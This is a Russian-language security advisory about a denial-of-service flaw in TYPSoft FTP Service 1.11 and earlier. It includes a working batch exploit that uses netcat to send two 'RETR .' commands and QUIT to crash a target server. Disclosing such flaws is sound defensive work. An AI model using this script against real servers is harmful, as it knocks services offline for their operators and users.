Удаленный отказ в обслуживании в TYPSoft FTP server

Дата публикации:
01.09.2004
Дата изменения:
17.10.2006
Всего просмотров:
881
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: TYPSoft FTP Service 1.11 и более ранние версии

Описание: Уязвимость обнаружена в TYPSoft FTP server. Удаленный авторизованный пользователь может вызвать условия отказа в обслуживании на целевом сервере.

Удаленный авторизованный пользователем (включая анонимного пользователя) может выполнить две последовательных команды "RETR .", за которыми следует команда "QUIT", чтобы вызвать условия отказа в обслуживании на целевом FTP сервере.

Пример/Эксплоит:

@echo off
if '%3'=='' echo Usage:%0 target ^<UserName^> ^<PassWord^> [port]&goto 
:eof
set FTPUSER=%2
set FTPPWD=%3
set PORT=21
if not '%4'=='' set PORT=%4
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&goto :eof
 
echo USER %FTPUSER%>ftp.cmd
echo PASS %FTPPWD%>>ftp.cmd
echo RETR .>>ftp.cmd
echo RETR .>>ftp.cmd
echo QUIT>>ftp.cmd
nc -v %1 %PORT%<ftp.cmd
del ftp.cmd

URL производителя:http://en.typsoft.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: DOS@TFS

или введите имя

CAPTCHA